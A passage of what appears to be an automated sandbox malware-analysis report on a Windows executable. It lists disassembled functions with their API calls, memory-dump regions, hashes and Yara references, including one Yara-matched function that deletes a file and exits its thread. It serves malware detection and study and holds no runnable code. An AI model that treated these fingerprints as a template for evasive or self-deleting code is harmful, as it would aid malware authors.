                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: MessageSend
                                    • String ID:
                                    • API String ID: 3850602802-0
                                    • Opcode ID: 94c9bcd1766b2f0aff132365435f0728968a439e34cbe20554606ac76dec1863
                                    • Instruction ID: 406d4cae92cb785ab7f0ac13e9b06b9a1e8655f8b941508392e2255961350bdf
                                    • Opcode Fuzzy Hash: 94c9bcd1766b2f0aff132365435f0728968a439e34cbe20554606ac76dec1863
                                    • Instruction Fuzzy Hash: C50148F1B407057AF53496699CC1FA7A3AD9FD9B55F00451AB701D72C0C6E4EC464634
                                    Function 00420FD4 Relevance: 7.6, APIs: 5, Instructions: 55windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SendMessageA.USER32(?,00000154), ref: 00420FE5
                                    • SendMessageA.USER32(?,00000153,?,00000000), ref: 00420FFC
                                      • Part of subcall function 00413B40: SendMessageA.USER32(?,00000030,?,00000001), ref: 00413B9D
                                    • SendMessageA.USER32(?,00000154), ref: 00421025
                                    • SendMessageA.USER32(?,00000153,?,?), ref: 0042103D
                                    • InvalidateRect.USER32(?,?,00000001,?,?), ref: 00421046
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: MessageSend$InvalidateRect
                                    • String ID:
                                    • API String ID: 2778011698-0
                                    • Opcode ID: f1888a7e179efd1b61b01ebc94699335342ea66a25b018f934b894b4c48d7389
                                    • Instruction ID: c5b20fc2b9c0c5c8d08232e6d247ff8843f4cb7405a5beffc5b73ad12c4baa58
                                    • Opcode Fuzzy Hash: f1888a7e179efd1b61b01ebc94699335342ea66a25b018f934b894b4c48d7389
                                    • Instruction Fuzzy Hash: D5016D71240B05AFE224DB69DC81FB7B7ACEF85748F01892DF64287780C679B9098A24
                                    Function 004BEA56 Relevance: 7.6, APIs: 5, Instructions: 52stringregistryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • __EH_prolog.LIBCMT ref: 004BEA5B
                                    • GetClassInfoA.USER32(?,?,?), ref: 004BEA76
                                    • RegisterClassA.USER32(00000004), ref: 004BEA81
                                    • lstrcat.KERNEL32(00000034,?), ref: 004BEAB8
                                    • lstrcat.KERNEL32(00000034,?), ref: 004BEAC6
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: Classlstrcat$H_prologInfoRegister
                                    • String ID:
                                    • API String ID: 106226465-0
                                    • Opcode ID: ac8975d4646361c569201774565d71ef6d9346ad022c05bf5ebe79874937a58e
                                    • Instruction ID: cd5ae94c7d7f552c814e5d255b9e0c9f61d07d48c9742fa51add316ae0847c8a
                                    • Opcode Fuzzy Hash: ac8975d4646361c569201774565d71ef6d9346ad022c05bf5ebe79874937a58e
                                    • Instruction Fuzzy Hash: E911E535A00204BEC710AFA69C41FDE7BB8EF59714F00856FF406A7551C7B9E604CA69
                                    Function 004AF518 Relevance: 7.5, APIs: 5, Instructions: 38threadCOMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • GetLastError.KERNEL32(00000035,0000001D,004AC452,004B0B52,004B7539,0000001D,?,00000000), ref: 004AF51A
                                    • TlsGetValue.KERNEL32(?,00000000), ref: 004AF528
                                    • SetLastError.KERNEL32(00000000,?,00000000), ref: 004AF574
                                      • Part of subcall function 004AC846: RtlAllocateHeap.NTDLL(00000008,004AF53D,00000000), ref: 004AC93C
                                    • TlsSetValue.KERNEL32(00000000,?,00000000), ref: 004AF54C
                                    • GetCurrentThreadId.KERNEL32 ref: 004AF55D
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: ErrorLastValue$AllocateCurrentHeapThread
                                    • String ID:
                                    • API String ID: 2047054392-0
                                    • Opcode ID: 684b4a2a591a1d7550d4fac64497a942c85673ab945ac4acb18c1ce197be67e8
                                    • Instruction ID: 8813d2a9a264a9307ced1936798257cc4364b20147c4ba97d0255a585c2c99c5
                                    • Opcode Fuzzy Hash: 684b4a2a591a1d7550d4fac64497a942c85673ab945ac4acb18c1ce197be67e8
                                    • Instruction Fuzzy Hash: 68F0F631D016127BC7712F71BC09A1A3B60AB527B1B14053BFA45D62D1CF28C905969C
                                    Function 0242569F Relevance: 7.5, APIs: 5, Instructions: 37sleepfilestringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,?), ref: 024256CD
                                    • GetFileAttributesA.KERNEL32(00000000), ref: 024256E3
                                    • DeleteFileA.KERNEL32(00000000), ref: 024256F7
                                    • Sleep.KERNEL32(00002800), ref: 02425702
                                    • RtlExitUserThread.NTDLL(00000000), ref: 0242570C
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3795163173.0000000002420000.00000040.00001000.00020000.00000000.sdmp, Offset: 02420000, based on PE: true
                                    • Associated: 00000006.00000002.3795163173.0000000002495000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.0000000002498000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.000000000249B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.00000000024A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.00000000024A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_2420000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$AttributesDeleteExitSleepThreadUserlstrcpy
                                    • String ID:
                                    • API String ID: 1172011736-0
                                    • Opcode ID: e0e54c19f49ce2e969f7924864a19e1d167783cf6dc550392b791f20afe6e881
                                    • Instruction ID: 9a052eeaba586b683e9cd145ad8a47506ef67ecae37055e8f03edf0ed00ff5bb
                                    • Opcode Fuzzy Hash: e0e54c19f49ce2e969f7924864a19e1d167783cf6dc550392b791f20afe6e881
                                    • Instruction Fuzzy Hash: C3F02132D4431497E7188BB4DC4CBE7BB79BB54311F8046A6FA1AD11C0DB719958CF51
                                    Function 00445810 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 277COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetCurrentObject.GDI32(?), ref: 004458DB
                                    • LPtoDP.GDI32(?,00000000,00000001), ref: 00445928
                                    • DPtoLP.GDI32(?,00000000,00000001), ref: 0044594B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: CurrentObject
                                    • String ID: pTL
                                    • API String ID: 844725943-168633513
                                    • Opcode ID: 81077456b3fe08d3b4d27e96222dbf8bf1cabd13402bbd02baabc1d4d7fd8e89
                                    • Instruction ID: 183e886edd81631d63bfdc0feaed128f55d892a7034993e0387bef62622d86d9
                                    • Opcode Fuzzy Hash: 81077456b3fe08d3b4d27e96222dbf8bf1cabd13402bbd02baabc1d4d7fd8e89
                                    • Instruction Fuzzy Hash: 47A1A971208B409BEB18DF55C890B2FB7E9ABC8708F04491EF58693352DB78ED45CB5A
                                    Function 004199E0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 127COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetStockObject.GDI32 ref: 00419ABE
                                    • LoadCursorA.USER32(00000000,00007F00), ref: 00419ACC
                                      • Part of subcall function 004343B0: GetClassInfoA.USER32(?,?,?), ref: 004343C8
                                    • CreateSolidBrush.GDI32(00000000), ref: 00419B1B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: BrushClassCreateCursorInfoLoadObjectSolidStock
                                    • String ID: _EL_PicBox
                                    • API String ID: 3644167297-3936694249
                                    • Opcode ID: c427d95e5bc6f178502dac9d31efac785c1c5e1ff50dea262d5f4d8153c26ed7
                                    • Instruction ID: 616189ee233bd0a3689f4a51498e8a71b6b83607c3f617dc0196d5162f876d05
                                    • Opcode Fuzzy Hash: c427d95e5bc6f178502dac9d31efac785c1c5e1ff50dea262d5f4d8153c26ed7
                                    • Instruction Fuzzy Hash: 81416DB1604700ABD364DF69C851FABB7E8EF88714F00491EF59A87380EB74AC41CBA5
                                    Function 00426F90 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 104COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 004BDE44: __EH_prolog.LIBCMT ref: 004BDE49
                                    • DestroyAcceleratorTable.USER32(?), ref: 0042702B
                                    • DestroyCursor.USER32(00000000), ref: 00427055
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: Destroy$AcceleratorCursorH_prologTable
                                    • String ID: @hB$@hB
                                    • API String ID: 1561936085-1976522915
                                    • Opcode ID: 6140b625b5649b5a7ea72d2413c9b25739ab17b8d3f250e666e67653be35cf67
                                    • Instruction ID: 3166531f0925407aa2ad0d273379069b690d24ae78076b848047b2dcc2f19b53
                                    • Opcode Fuzzy Hash: 6140b625b5649b5a7ea72d2413c9b25739ab17b8d3f250e666e67653be35cf67
                                    • Instruction Fuzzy Hash: 2A31CEB16043269FC320EF19A880A6AF7E4FB45758F910A1EF44593341D739A8098BDA
                                    Function 0042F900 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 100COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: CursorDestroy
                                    • String ID: pTL
                                    • API String ID: 1272848555-168633513
                                    • Opcode ID: babfe00a8da1491cdd2cfa362caae2ae18e2072580169e071fc01aa56d661aeb
                                    • Instruction ID: 67764f4b912f21bf9da09dbb2490c6625230e01f6553a17263520893623b0dc9
                                    • Opcode Fuzzy Hash: babfe00a8da1491cdd2cfa362caae2ae18e2072580169e071fc01aa56d661aeb
                                    • Instruction Fuzzy Hash: F441B1B05047819BC311DF69C89079AFBE4BF59308F844A2FE4DA93741CB7DA509CB6A
                                    Function 004C62BB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 97COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: AtomDeleteGlobal$H_prolog
                                    • String ID: WdL
                                    • API String ID: 3979803748-3897115199
                                    • Opcode ID: 3a9463d98e89fd35eb45f00791c5e6d02072597c60907d8dd893c79c6d155b2e
                                    • Instruction ID: 54c4fb6ce3b2f647b721c2c39637e78db9a7c4f998a77e251e3602da8e16813b
                                    • Opcode Fuzzy Hash: 3a9463d98e89fd35eb45f00791c5e6d02072597c60907d8dd893c79c6d155b2e
                                    • Instruction Fuzzy Hash: CD3191345007409FCB64EFA5C885F6ABBE6BF05304F55847EE15A87672CB74AC40CB58
                                    Function 00438550 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 97memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00438130: GetObjectA.GDI32(?,00000018,?), ref: 0043816D
                                    • GlobalAlloc.KERNEL32(00000002,?), ref: 004385DA
                                    • GlobalFix.KERNEL32(00000000), ref: 004385F5
                                    • GlobalUnWire.KERNEL32(00000000), ref: 0043860E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: Global$AllocObjectWire
                                    • String ID: pTL
                                    • API String ID: 3598329280-168633513
                                    • Opcode ID: e25e6ec8c257063cf141bead1986bb9353d6d23a22f3d3162811c0920ae9f041
                                    • Instruction ID: e53177e41bc3011753283d4da60d7bab684a84c33e2cb3c5651efdfe1bb34c1f
                                    • Opcode Fuzzy Hash: e25e6ec8c257063cf141bead1986bb9353d6d23a22f3d3162811c0920ae9f041
                                    • Instruction Fuzzy Hash: 0931B0716083418FC304EF18C885B6FFBE4FB98754F44092EF48583341DB789908CAA6
                                    Function 004C6171 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58threadCOMMON
                                    Download Yara Rule
                                    APIs
                                    • __EH_prolog.LIBCMT ref: 004C6176
                                      • Part of subcall function 004C6652: __EH_prolog.LIBCMT ref: 004C6657
                                    • GetCurrentThread.KERNEL32 ref: 004C61C4
                                    • GetCurrentThreadId.KERNEL32 ref: 004C61CD
                                    Strings
